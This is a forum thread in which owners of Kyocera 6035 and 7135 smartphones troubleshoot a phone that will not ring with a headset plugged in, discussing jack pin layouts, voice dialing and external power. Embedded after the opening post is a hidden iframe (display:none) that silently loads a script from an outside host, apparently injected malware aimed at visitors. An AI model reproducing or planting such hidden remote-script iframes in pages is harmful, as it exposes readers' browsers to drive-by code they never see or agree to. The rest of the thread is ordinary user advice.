+ Reply to Thread

No ringer when headset is plugged in

Hi, I had this problem on my old 6035, and my 7135 is doing the same thing.

If I plug in the headset, the phone does not ring in the earpiece or from the phone.
    I have tried activating voice answer, which I loved on my 6035, and also the ring through speaker when headset is pluggedin, both to no avail. I cannot get it to ring at all with the headset plugged in. It works fine without it plugged in, and shows an incoming call on the screen, but that't it. Anyone else had this problem and know a work around?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Wierd that its a porblem on both your old 6035 and also your 7135......dumb question but could your problem be with the headset you are using?
    iPhone therefore iAm.

AJR
    Not all 2.5mm jacks are the same and won't work with all phones. Most of the standard headphone/microphone will work with both the 6035 and 7135. If you have any type of special features such as an answer/disconnect button or a volume control, the 2.5mm jack may be have a different connector setup. Some have 2 rings around the jack, some have 3, sometimes the 2 or 3 rings are in different spots so they don't actually make a connection in the headphone jack on the phone. Or it may sit halfway on the connection, sometimes shorting it out so the phone won't ring.

I used 4 or 5 different headsets with my 6035 and they worked fine. I did come across a few that didn't work. Right now, I have a headset that works fine in the 7135, but doesn't have the answer/hangup button. I'm waiting for my stereo headset from Dan's Cellular.

In order for the voice dialing to work with the headset plugged in your must have the phone attached to an external power source (car/traval charger). This is actually stated in the help screen for voice dialing. This I have tested.

As far as the ringing through the speaker with the headset plugged in, I too have the same problem and I am wondering if we need power plugged in for that to work also. This I have not tested.

Originally posted by cdkone
    In order for the voice dialing to work with the headset plugged in your must have the phone attached to an external power source (car/traval charger). This is actually stated in the help screen for voice dialing. This I have tested.
    I use the voice dialing all the time without the phone being plugged into external power. I'm using the standard Kyocera stereo headset. I can initiate calls as well as answer them using the voice commands. Even works while listening to MP3s.

The help actually states that you need a headset or car kit to use voice dialing. The only thing that requires external power is to use the wake up function which you can accomplish by pressing the button on the headset anyway.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

It's definitly not the headset, it used to work fine on my 6035. It stopped ringing through it once before on the 6035 and I reset it and it worked again, then it completely stopped and I couldn't get it to work again. I have tried my old headset on the 7135 and the new jabra one, and cannot get a ring out of the phone or the headset with it plugged in.

Administrator
    the 7135 phone jack is proprietary 4 pin configuration. have you tried any other headsets?

Wait a minute. I just posted about this bug over in the Kinoma topic. I've been able to duplicate it - but only the part about the external speaker not ringing. Inside the headset a get a little tone alert and then the female voice saying "Incoming Call - Do you want to answer?"

Don't you even get that through your headset?

(By the way, I just LOVE having my own sexy private secretary inside my phone! I wish I could get her to answer all my calls, even when I'm not using the headset!)

I can't even get the incoming call voice in the headset now. Any ideas on how to remove the two files that are shown twice so I can see if this is the culprit, and which ones to remove since they are listed twice???
    MMCLib, PCMSoundLib

Thanks!